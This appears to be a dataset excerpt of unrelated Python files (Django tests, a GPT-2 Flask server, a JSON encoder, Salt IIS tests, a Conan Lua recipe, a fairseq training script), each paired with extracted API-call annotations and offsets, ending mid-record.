self.business=Business(name = "hardware", description="your stop for best prices", user= profile, neighbourhood_id=neighbourhood, business_email='<EMAIL>')
self.business.save()
def test_instance(self):
self.assertTrue(isinstance(self.business,Business))
def test_create_business(self):
self.business.create_business()
businesses=Business.objects.all()
self.assertTrue(len(businesses)>0)
def test_delete_business(self):
self.business.delete_business()
businesses=Business.objects.all()
self.assertTrue(len(businesses)==0)
def test_update_business(self):
self.business.create_business()
# self.business.update_business(self.business.id, 'hardware')
updated_business = Business.objects.all()
self.assertTrue(len(updated_business) > 0)
def tearDown(self):
Business.objects.all().delete()
| [
"django.contrib.auth.models.User.objects.get"
] | [((133, 155), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'id': '(1)'}), '(id=1)\n', (149, 155), False, 'from django.contrib.auth.models import User\n')] |
# -*- coding: utf-8 -*-
import json
import os
import numpy as np
import tensorflow.compat.v1 as tf
from src import model, sample, encoder
from flask import Flask
from flask import request, jsonify
import time
######model
def interact_model(
model_name='run1',
seed=None,
nsamples=1,
batch_size=1,
length=None,
temperature=1,
top_k=0,
top_p=1,
models_dir='checkpoint',
):
models_dir = os.path.expanduser(os.path.expandvars(models_dir))
if batch_size is None:
batch_size = 1
assert nsamples % batch_size == 0
enc = encoder.get_encoder(model_name, models_dir)
hparams = model.default_hparams()
with open(os.path.join(models_dir, model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
if length is None:
length = hparams.n_ctx // 2
elif length > hparams.n_ctx:
raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
with tf.Session(graph=tf.Graph()) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join(models_dir, "run1"))
saver.restore(sess, ckpt)
yield sess, context, output, enc
def output_something(bio, sess, context, output, enc):
raw_text = bio#input("Model prompt >>> ")
context_tokens = enc.encode(raw_text)
generated = 0
out = sess.run(output, feed_dict={
context: [context_tokens for _ in range(1)]
})[:, len(context_tokens):] #Get samples
text = enc.decode(out[0]) #decodes samples
print(text)
return text
########API
gen = interact_model()
sess, context, output, enc = next(gen)
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def welcome():
start_time = time.time()
bio = request.args.get('bio')
res = output_something(bio, sess, context, output, enc)
sentences = res.split("\n")[:3]
print("----------------------------------------------------------- %s seconds ----------------------------------------------" % (time.time() - start_time))
return jsonify(sentences=sentences)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=105) | [
"tensorflow.compat.v1.placeholder",
"flask.request.args.get",
"src.model.default_hparams",
"src.encoder.get_encoder",
"tensorflow.compat.v1.Graph",
"flask.Flask",
"os.path.expandvars",
"os.path.join",
"numpy.random.seed",
"tensorflow.compat.v1.set_random_seed",
"src.sample.sample_sequence",
"j... | [((2062, 2077), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (2067, 2077), False, 'from flask import Flask\n'), ((583, 626), 'src.encoder.get_encoder', 'encoder.get_encoder', (['model_name', 'models_dir'], {}), '(model_name, models_dir)\n', (602, 626), False, 'from src import model, sample, encoder\n'), ((641, 664), 'src.model.default_hparams', 'model.default_hparams', ([], {}), '()\n', (662, 664), False, 'from src import model, sample, encoder\n'), ((2152, 2163), 'time.time', 'time.time', ([], {}), '()\n', (2161, 2163), False, 'import time\n'), ((2175, 2198), 'flask.request.args.get', 'request.args.get', (['"""bio"""'], {}), "('bio')\n", (2191, 2198), False, 'from flask import request, jsonify\n'), ((2471, 2499), 'flask.jsonify', 'jsonify', ([], {'sentences': 'sentences'}), '(sentences=sentences)\n', (2478, 2499), False, 'from flask import request, jsonify\n'), ((452, 482), 'os.path.expandvars', 'os.path.expandvars', (['models_dir'], {}), '(models_dir)\n', (470, 482), False, 'import os\n'), ((1037, 1081), 'tensorflow.compat.v1.placeholder', 'tf.placeholder', (['tf.int32', '[batch_size, None]'], {}), '(tf.int32, [batch_size, None])\n', (1051, 1081), True, 'import tensorflow.compat.v1 as tf\n'), ((1090, 1110), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1104, 1110), True, 'import numpy as np\n'), ((1119, 1143), 'tensorflow.compat.v1.set_random_seed', 'tf.set_random_seed', (['seed'], {}), '(seed)\n', (1137, 1143), True, 'import tensorflow.compat.v1 as tf\n'), ((1161, 1310), 'src.sample.sample_sequence', 'sample.sample_sequence', ([], {'hparams': 'hparams', 'length': 'length', 'context': 'context', 'batch_size': 'batch_size', 'temperature': 'temperature', 'top_k': 'top_k', 'top_p': 'top_p'}), '(hparams=hparams, length=length, context=context,\n batch_size=batch_size, temperature=temperature, top_k=top_k, top_p=top_p)\n', (1183, 1310), False, 'from src import model, sample, encoder\n'), ((1382, 1398), 'tensorflow.compat.v1.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (1396, 1398), True, 'import tensorflow.compat.v1 as tf\n'), ((679, 731), 'os.path.join', 'os.path.join', (['models_dir', 'model_name', '"""hparams.json"""'], {}), "(models_dir, model_name, 'hparams.json')\n", (691, 731), False, 'import os\n'), ((774, 786), 'json.load', 'json.load', (['f'], {}), '(f)\n', (783, 786), False, 'import json\n'), ((1441, 1473), 'os.path.join', 'os.path.join', (['models_dir', '"""run1"""'], {}), "(models_dir, 'run1')\n", (1453, 1473), False, 'import os\n'), ((998, 1008), 'tensorflow.compat.v1.Graph', 'tf.Graph', ([], {}), '()\n', (1006, 1008), True, 'import tensorflow.compat.v1 as tf\n'), ((2433, 2444), 'time.time', 'time.time', ([], {}), '()\n', (2442, 2444), False, 'import time\n')] |
"""
Helper functions related to json
Author: <NAME>
"""
import datetime
import decimal
import json
import uuid
import pathlib
class JSONEncoder(json.JSONEncoder):
"""
A custom JSONEncoder that can handle a bit more data types than the one from stdlib.
"""
def default(self, o):
# early passthrough if it works by default
try:
return json.JSONEncoder.default(self, o)
except Exception:
pass
# handle Path objects
if isinstance(o, pathlib.Path):
return str(o).replace('\\', '/')
# handle UUID objects
if isinstance(o, uuid.UUID):
return str(o)
if isinstance(o, (datetime.datetime, datetime.time, datetime.date)):
return o.isoformat()
if isinstance(o, datetime.timedelta):
return o.total_seconds()
if isinstance(o, (complex, decimal.Decimal)):
return str(o)
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, o)
| [
"json.JSONEncoder.default"
] | [((1019, 1052), 'json.JSONEncoder.default', 'json.JSONEncoder.default', (['self', 'o'], {}), '(self, o)\n', (1043, 1052), False, 'import json\n'), ((382, 415), 'json.JSONEncoder.default', 'json.JSONEncoder.default', (['self', 'o'], {}), '(self, o)\n', (406, 415), False, 'import json\n')] |
# -*- coding: utf-8 -*-
'''
:synopsis: Unit Tests for Windows IIS Module 'module.win_iis'
:platform: Windows
:maturity: develop
versionadded:: Carbon
'''
# Import Python Libs
from __future__ import absolute_import
import json
# Import Salt Libs
from salt.exceptions import SaltInvocationError
from salt.modules import win_iis
# Import Salt Testing Libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON,
)
ensure_in_syspath('../../')
# Globals
win_iis.__salt__ = {}
# Make sure this module runs on Windows system
HAS_IIS = win_iis.__virtual__()
@skipIf(not HAS_IIS, 'This test case runs only on Windows systems')
@skipIf(NO_MOCK, NO_MOCK_REASON)
class WinIisTestCase(TestCase):
'''
Test cases for salt.modules.win_iis
'''
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value=dict()))
def test_create_apppool(self):
'''
Test - Create an IIS application pool.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.create_apppool('MyTestPool'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={
'retcode': 0,
'stdout': json.dumps([{'name': 'MyTestPool', 'state': 'Started',
'Applications': {'value': ['MyTestSite'],
'Count': 1}}])}))
def test_list_apppools(self):
'''
Test - List all configured IIS application pools.
'''
with patch.dict(win_iis.__salt__):
self.assertIsInstance(win_iis.list_apppools(), dict)
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value={'MyTestPool': {
'applications': list(),
'state': 'Started'}}))
def test_remove_apppool(self):
'''
Test - Remove an IIS application pool.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.remove_apppool('MyTestPool'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
def test_restart_apppool(self):
'''
Test - Restart an IIS application pool.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.restart_apppool('MyTestPool'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value=dict()))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value=dict()))
def test_create_site(self):
'''
Test - Create a basic website in IIS.
'''
kwargs = {'name': 'MyTestSite', 'sourcepath': r'C:\inetpub\wwwroot',
'apppool': 'MyTestPool', 'hostheader': 'mytestsite.local',
'ipaddress': '*', 'port': 80, 'protocol': 'http'}
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.create_site(**kwargs))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value=dict()))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value=dict()))
def test_create_site_failed(self):
'''
Test - Create a basic website in IIS using invalid data.
'''
kwargs = {'name': 'MyTestSite', 'sourcepath': r'C:\inetpub\wwwroot',
'apppool': 'MyTestPool', 'hostheader': 'mytestsite.local',
'ipaddress': '*', 'port': 80, 'protocol': 'invalid-protocol-name'}
with patch.dict(win_iis.__salt__):
self.assertRaises(SaltInvocationError, win_iis.create_site, **kwargs)
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value={
'MyTestSite': {'apppool': 'MyTestPool',
'bindings': {'*:80:': {'certificatehash': None,
'certificatestorename': None,
'hostheader': None,
'ipaddress': '*', 'port': 80,
'protocol': 'http',
'sslflags': 0}},
'id': 1, 'sourcepath': r'C:\inetpub\wwwroot',
'state': 'Started'}}))
def test_remove_site(self):
'''
Test - Delete a website from IIS.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.remove_site('MyTestSite'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={
'retcode': 0,
'stdout': json.dumps([{'applicationPool': 'MyTestPool',
'name': 'testApp', 'path': '/testApp',
'PhysicalPath': r'C:\inetpub\apps\testApp',
'preloadEnabled': False,
'protocols': 'http'}])}))
def test_list_apps(self):
'''
Test - Get all configured IIS applications for the specified site.
'''
with patch.dict(win_iis.__salt__):
self.assertIsInstance(win_iis.list_apps('MyTestSite'), dict)
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value={
'MyTestSite': {'apppool': 'MyTestPool',
'bindings': {'*:80:': {'certificatehash': None,
'certificatestorename': None,
'hostheader': None,
'ipaddress': '*', 'port': 80,
'protocol': 'http',
'sslflags': 0}},
'id': 1, 'sourcepath': r'C:\inetpub\wwwroot',
'state': 'Started'}}))
def test_list_bindings(self):
'''
Test - Get all configured IIS bindings for the specified site.
'''
with patch.dict(win_iis.__salt__):
self.assertIsInstance(win_iis.list_bindings('MyTestSite'), dict)
if __name__ == '__main__':
from integration import run_tests # pylint: disable=import-error
run_tests(WinIisTestCase, needs_daemon=False)
| [
"salttesting.mock.patch.dict",
"salt.modules.win_iis.remove_apppool",
"salt.modules.win_iis.create_site",
"salt.modules.win_iis.list_apps",
"integration.run_tests",
"salt.modules.win_iis.__virtual__",
"salt.modules.win_iis.create_apppool",
"salttesting.mock.MagicMock",
"salttesting.helpers.ensure_in... | [((556, 583), 'salttesting.helpers.ensure_in_syspath', 'ensure_in_syspath', (['"""../../"""'], {}), "('../../')\n", (573, 583), False, 'from salttesting.helpers import ensure_in_syspath\n'), ((675, 696), 'salt.modules.win_iis.__virtual__', 'win_iis.__virtual__', ([], {}), '()\n', (694, 696), False, 'from salt.modules import win_iis\n'), ((700, 766), 'salttesting.skipIf', 'skipIf', (['(not HAS_IIS)', '"""This test case runs only on Windows systems"""'], {}), "(not HAS_IIS, 'This test case runs only on Windows systems')\n", (706, 766), False, 'from salttesting import TestCase, skipIf\n'), ((768, 799), 'salttesting.skipIf', 'skipIf', (['NO_MOCK', 'NO_MOCK_REASON'], {}), '(NO_MOCK, NO_MOCK_REASON)\n', (774, 799), False, 'from salttesting import TestCase, skipIf\n'), ((7149, 7194), 'integration.run_tests', 'run_tests', (['WinIisTestCase'], {'needs_daemon': '(False)'}), '(WinIisTestCase, needs_daemon=False)\n', (7158, 7194), False, 'from integration import run_tests\n'), ((943, 981), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (952, 981), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((1935, 1973), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (1944, 1973), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((2462, 2500), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (2471, 2500), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((2775, 2813), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (2784, 2813), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((3477, 3515), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (3486, 3515), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((4245, 4283), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (4254, 4283), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((4342, 4655), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'MyTestSite': {'apppool': 'MyTestPool', 'bindings': {'*:80:': {\n 'certificatehash': None, 'certificatestorename': None, 'hostheader':\n None, 'ipaddress': '*', 'port': 80, 'protocol': 'http', 'sslflags': 0}},\n 'id': 1, 'sourcepath': 'C:\\\\inetpub\\\\wwwroot', 'state': 'Started'}}"}), "(return_value={'MyTestSite': {'apppool': 'MyTestPool', 'bindings':\n {'*:80:': {'certificatehash': None, 'certificatestorename': None,\n 'hostheader': None, 'ipaddress': '*', 'port': 80, 'protocol': 'http',\n 'sslflags': 0}}, 'id': 1, 'sourcepath': 'C:\\\\inetpub\\\\wwwroot', 'state':\n 'Started'}})\n", (4351, 4655), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((6074, 6387), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'MyTestSite': {'apppool': 'MyTestPool', 'bindings': {'*:80:': {\n 'certificatehash': None, 'certificatestorename': None, 'hostheader':\n None, 'ipaddress': '*', 'port': 80, 'protocol': 'http', 'sslflags': 0}},\n 'id': 1, 'sourcepath': 'C:\\\\inetpub\\\\wwwroot', 'state': 'Started'}}"}), "(return_value={'MyTestSite': {'apppool': 'MyTestPool', 'bindings':\n {'*:80:': {'certificatehash': None, 'certificatestorename': None,\n 'hostheader': None, 'ipaddress': '*', 'port': 80, 'protocol': 'http',\n 'sslflags': 0}}, 'id': 1, 'sourcepath': 'C:\\\\inetpub\\\\wwwroot', 'state':\n 'Started'}})\n", (6083, 6387), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((1194, 1222), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (1204, 1222), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((1785, 1813), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (1795, 1813), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((2311, 2339), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (2321, 2339), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((2623, 2651), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (2633, 2651), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((3333, 3361), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (3343, 3361), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((4078, 4106), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (4088, 4106), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((5176, 5204), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (5186, 5204), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((5913, 5941), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (5923, 5941), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((6939, 6967), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (6949, 6967), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((1252, 1288), 'salt.modules.win_iis.create_apppool', 'win_iis.create_apppool', (['"""MyTestPool"""'], {}), "('MyTestPool')\n", (1274, 1288), False, 'from salt.modules import win_iis\n'), ((1849, 1872), 'salt.modules.win_iis.list_apppools', 'win_iis.list_apppools', ([], {}), '()\n', (1870, 1872), False, 'from salt.modules import win_iis\n'), ((2369, 2405), 'salt.modules.win_iis.remove_apppool', 'win_iis.remove_apppool', (['"""MyTestPool"""'], {}), "('MyTestPool')\n", (2391, 2405), False, 'from salt.modules import win_iis\n'), ((2681, 2718), 'salt.modules.win_iis.restart_apppool', 'win_iis.restart_apppool', (['"""MyTestPool"""'], {}), "('MyTestPool')\n", (2704, 2718), False, 'from salt.modules import win_iis\n'), ((3391, 3420), 'salt.modules.win_iis.create_site', 'win_iis.create_site', ([], {}), '(**kwargs)\n', (3410, 3420), False, 'from salt.modules import win_iis\n'), ((5234, 5267), 'salt.modules.win_iis.remove_site', 'win_iis.remove_site', (['"""MyTestSite"""'], {}), "('MyTestSite')\n", (5253, 5267), False, 'from salt.modules import win_iis\n'), ((5977, 6008), 'salt.modules.win_iis.list_apps', 'win_iis.list_apps', (['"""MyTestSite"""'], {}), "('MyTestSite')\n", (5994, 6008), False, 'from salt.modules import win_iis\n'), ((7003, 7038), 'salt.modules.win_iis.list_bindings', 'win_iis.list_bindings', (['"""MyTestSite"""'], {}), "('MyTestSite')\n", (7024, 7038), False, 'from salt.modules import win_iis\n'), ((1436, 1552), 'json.dumps', 'json.dumps', (["[{'name': 'MyTestPool', 'state': 'Started', 'Applications': {'value': [\n 'MyTestSite'], 'Count': 1}}]"], {}), "([{'name': 'MyTestPool', 'state': 'Started', 'Applications': {\n 'value': ['MyTestSite'], 'Count': 1}}])\n", (1446, 1552), False, 'import json\n'), ((5415, 5601), 'json.dumps', 'json.dumps', (["[{'applicationPool': 'MyTestPool', 'name': 'testApp', 'path': '/testApp',\n 'PhysicalPath': 'C:\\\\inetpub\\\\apps\\\\testApp', 'preloadEnabled': False,\n 'protocols': 'http'}]"], {}), "([{'applicationPool': 'MyTestPool', 'name': 'testApp', 'path':\n '/testApp', 'PhysicalPath': 'C:\\\\inetpub\\\\apps\\\\testApp',\n 'preloadEnabled': False, 'protocols': 'http'}])\n", (5425, 5601), False, 'import json\n')] |
from conans import ConanFile, CMake, tools
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
class LuaConan(ConanFile):
name = "Lua"
version = "5.3.5"
description = "Lua is a powerful, fast, lightweight, embeddable scripting language."
# topics can get used for searches, GitHub topics, Bintray tags etc. Add here keywords about the library
topics = ("conan", "lua", "scripting", "embedded")
url = "https://github.com/helmesjo/conan-lua"
homepage = "https://www.lua.org"
author = "helmesjo <<EMAIL>>"
license = "MIT" # Indicates license type of the packaged library; please use SPDX Identifiers https://spdx.org/licenses/
exports = ["LICENSE.md"] # Packages the license for the conanfile.py
# Remove following lines if the target lib does not use cmake.
exports_sources = ["CMakeLists.txt"]
generators = "cmake"
# Options may need to change depending on the packaged library.
settings = "os", "arch", "compiler", "build_type"
options = {"shared": [False], "fPIC": [True, False]}
default_options = {"shared": False, "fPIC": True}
# Custom attributes for Bincrafters recipe conventions
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
requires = ()
def config_options(self):
if self.settings.os == 'Windows':
del self.options.fPIC
def source(self):
source_url = "https://www.lua.org"
tools.get("{0}/ftp/lua-{1}.tar.gz".format(source_url, self.version), sha256="0c2eed3f960446e1a3e4b9a1ca2f3ff893b6ce41942cf54d5dd59ab4b3b058ac")
extracted_dir = "lua-" + self.version
# Rename to "source_subfolder" is a convention to simplify later steps
os.rename(extracted_dir, self._source_subfolder)
# For some reason uid & gid are wrong in some situations when renaming the unziped tar (happened in docker-in-docker configuration)
# Set it explicitly to match the current user & group
if os.name == "posix":
if os.system("chown -R {0}:{1} {2}".format(os.getuid(), os.getgid(), self._source_subfolder)) != 0:
self.output.error("Failed to change owner of source to current user & group id ({0}:{1})".format(os.getuid(), os.getgid()))
def _configure_cmake(self):
cmake = CMake(self)
cmake.definitions["SOURCE_SUBDIR"] = self._source_subfolder
cmake.configure(build_folder=self._build_subfolder)
return cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
self.cpp_info.includedirs.append("include/lua")
| [
"os.rename",
"conans.CMake",
"os.getuid",
"os.path.realpath",
"os.getgid",
"conans.tools.collect_libs"
] | [((81, 107), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (97, 107), False, 'import os\n'), ((1743, 1791), 'os.rename', 'os.rename', (['extracted_dir', 'self._source_subfolder'], {}), '(extracted_dir, self._source_subfolder)\n', (1752, 1791), False, 'import os\n'), ((2343, 2354), 'conans.CMake', 'CMake', (['self'], {}), '(self)\n', (2348, 2354), False, 'from conans import ConanFile, CMake, tools\n'), ((2815, 2839), 'conans.tools.collect_libs', 'tools.collect_libs', (['self'], {}), '(self)\n', (2833, 2839), False, 'from conans import ConanFile, CMake, tools\n'), ((2089, 2100), 'os.getuid', 'os.getuid', ([], {}), '()\n', (2098, 2100), False, 'import os\n'), ((2102, 2113), 'os.getgid', 'os.getgid', ([], {}), '()\n', (2111, 2113), False, 'import os\n'), ((2259, 2270), 'os.getuid', 'os.getuid', ([], {}), '()\n', (2268, 2270), False, 'import os\n'), ((2272, 2283), 'os.getgid', 'os.getgid', ([], {}), '()\n', (2281, 2283), False, 'import os\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import torch
import logging
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.utils.data import Dataset, DataLoader, BatchSampler
from torch.utils.data.distributed import DistributedSampler
from fairseq.tasks.translation import TranslationTask
from fairseq.data.language_pair_dataset import collate
from modules.data_utils import FairseqDataset
from modules.trainer import Trainer
from modules.utils import init_arg_parser
logging.basicConfig(
format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
stream=sys.stdout,
)
logger = logging.getLogger('fairseq.train')
def cleanup():
dist.destroy_process_group()
def setup(rank, world_size):
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '12355'
# initialize the process group
dist.init_process_group("nccl", rank=rank, world_size=world_size)
def load_dictionary(path, src_dict_name='source', tgt_dict_name='target'):
"""Load source & target fairseq dictionary.
"""
# path = self.args.data_name_or_path
src_dict = TranslationTask.load_dictionary(os.path.join(path, 'dict.{}.txt'.format(src_dict_name)))
tgt_dict = TranslationTask.load_dictionary(os.path.join(path, 'dict.{}.txt'.format(tgt_dict_name)))
assert src_dict.bos() == tgt_dict.bos() == 0
assert src_dict.pad() == tgt_dict.pad() == 1
assert src_dict.eos() == tgt_dict.eos() == 2
assert src_dict.unk() == tgt_dict.unk() == 3
logger.info('[{}] dictionary: {} types'.format('source', len(src_dict)))
logger.info('[{}] dictionary: {} types'.format('target', len(tgt_dict)))
return src_dict, tgt_dict
def main(rank, args, world_size):
if rank == 0:
logger.info(vars(args))
# create task & load source and taget dictionary
# translation_task = TranslationTask.setup_task(args)
logger.info(f"Running DDP on rank {rank}.")
setup(rank, world_size)
# build trainer
logger.info('- build trainer (rank {})...'.format(rank))
trainer = Trainer(args, logger, rank)
src_dict, tgt_dict = trainer.get_dicts()
# create datasets
logger.info('- loading training set (rank {})...'.format(rank))
train_dataset = FairseqDataset(src_dict, args.train_source, args.train_target,
max_positions=args.max_positions, no_bos=args.no_bos)
logger.info('- loading development set (rank {})...'.format(rank))
dev_dataset = FairseqDataset(src_dict, args.dev_source, args.dev_target,
max_positions=args.max_positions, no_bos=False)
torch.distributed.barrier() # make sure all datasets are loaded
def collate_fn(samples):
"""
Args:
samples: list of samples
"""
return collate(samples, train_dataset.pad_idx, train_dataset.eos_idx,
left_pad_source=True,
left_pad_target=False,
input_feeding=True)
train_sampler = DistributedSampler(train_dataset, num_replicas=world_size, rank=rank, shuffle=True)
train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, sampler=train_sampler,
collate_fn=collate_fn, pin_memory=True)
# train model
trainer.train(train_dataloader, train_sampler, dev_dataset, None)
# finish process
cleanup()
if __name__ == "__main__":
parser = init_arg_parser()
# TranslationTask.add_args(parser)
args = parser.parse_args()
# main(args)
n_gpus = torch.cuda.device_count()
mp.spawn(main,
args=(args, n_gpus),
nprocs=n_gpus,
join=True) | [
"logging.basicConfig",
"logging.getLogger",
"torch.distributed.barrier",
"torch.distributed.destroy_process_group",
"torch.multiprocessing.spawn",
"modules.trainer.Trainer",
"modules.utils.init_arg_parser",
"fairseq.data.language_pair_dataset.collate",
"torch.cuda.device_count",
"modules.data_util... | [((525, 685), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s | %(levelname)s | %(name)s | %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""', 'level': 'logging.INFO', 'stream': 'sys.stdout'}), "(format=\n '%(asctime)s | %(levelname)s | %(name)s | %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S', level=logging.INFO, stream=sys.stdout)\n", (544, 685), False, 'import logging\n'), ((704, 738), 'logging.getLogger', 'logging.getLogger', (['"""fairseq.train"""'], {}), "('fairseq.train')\n", (721, 738), False, 'import logging\n'), ((760, 788), 'torch.distributed.destroy_process_group', 'dist.destroy_process_group', ([], {}), '()\n', (786, 788), True, 'import torch.distributed as dist\n'), ((944, 1009), 'torch.distributed.init_process_group', 'dist.init_process_group', (['"""nccl"""'], {'rank': 'rank', 'world_size': 'world_size'}), "('nccl', rank=rank, world_size=world_size)\n", (967, 1009), True, 'import torch.distributed as dist\n'), ((2145, 2172), 'modules.trainer.Trainer', 'Trainer', (['args', 'logger', 'rank'], {}), '(args, logger, rank)\n', (2152, 2172), False, 'from modules.trainer import Trainer\n'), ((2330, 2450), 'modules.data_utils.FairseqDataset', 'FairseqDataset', (['src_dict', 'args.train_source', 'args.train_target'], {'max_positions': 'args.max_positions', 'no_bos': 'args.no_bos'}), '(src_dict, args.train_source, args.train_target,\n max_positions=args.max_positions, no_bos=args.no_bos)\n', (2344, 2450), False, 'from modules.data_utils import FairseqDataset\n'), ((2576, 2687), 'modules.data_utils.FairseqDataset', 'FairseqDataset', (['src_dict', 'args.dev_source', 'args.dev_target'], {'max_positions': 'args.max_positions', 'no_bos': '(False)'}), '(src_dict, args.dev_source, args.dev_target, max_positions=\n args.max_positions, no_bos=False)\n', (2590, 2687), False, 'from modules.data_utils import FairseqDataset\n'), ((2721, 2748), 'torch.distributed.barrier', 'torch.distributed.barrier', ([], {}), '()\n', (2746, 2748), False, 'import torch\n'), ((3124, 3211), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['train_dataset'], {'num_replicas': 'world_size', 'rank': 'rank', 'shuffle': '(True)'}), '(train_dataset, num_replicas=world_size, rank=rank,\n shuffle=True)\n', (3142, 3211), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((3231, 3351), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'batch_size': 'args.batch_size', 'sampler': 'train_sampler', 'collate_fn': 'collate_fn', 'pin_memory': '(True)'}), '(train_dataset, batch_size=args.batch_size, 